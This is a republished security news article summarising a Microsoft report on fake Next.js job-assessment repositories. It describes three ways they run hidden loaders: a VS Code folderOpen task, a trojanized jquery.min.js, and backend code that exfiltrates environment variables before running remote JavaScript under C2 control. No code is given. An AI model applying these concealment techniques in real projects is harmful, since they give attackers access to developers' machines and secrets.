A “coordinated developer-targeting campaign” is using malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into executing them and establish persistent access to compromised machines.
“The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week.
The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2).
The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1” to trick developers looking for jobs into running as part of an assessment process.
Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, have the end goal of executing an attacker‑controlled JavaScript directly in memory –
- Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. This involves the use of the runOn: “folderOpen” to configure the task.
- Build‑time execution during application development, where manually running the development server via “npm run dev” is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js, causing it to fetch a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js.
- Server startup execution via environment exfiltration and dynamic remote code execution, where launching the application backend causes malicious loader logic concealed within a backend module or route file to be executed. The loader transmits the process environment to the external server and executes JavaScript received as a response in memory within the Node.js server process.
Microsoft noted that all three methods lead to the same JavaScript payload that’s responsible for profiling the host and periodically polling a registration endpoint to get a unique “instanceId” identifier. This identifier is subsequently supplied in follow-on polls to correlate activity.
It’s also capable of executing server-provided JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial foothold into a persistent access pathway for receiving tasks by contacting a different C2 server and executing them in memory to minimize leaving traces on disk.
 |
| Attack chain overview |
“The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint,…
Source link
Disclaimer
We strive to uphold the highest ethical standards in all of our reporting and coverage. We blogs.grocliq.com want to be transparent with our readers about any potential conflicts of interest that may arise in our work. It’s possible that some of the investors we feature may have connections to other businesses, including competitors or companies we write about. However, we want to assure our readers that this will not have any impact on the integrity or impartiality of our reporting. We are committed to delivering accurate, unbiased news and information to our audience, and we will continue to uphold our ethics and principles in all of our work. Thank you for your trust and support.
Website Upgradation is going on for any glitch kindly connect at [email protected]
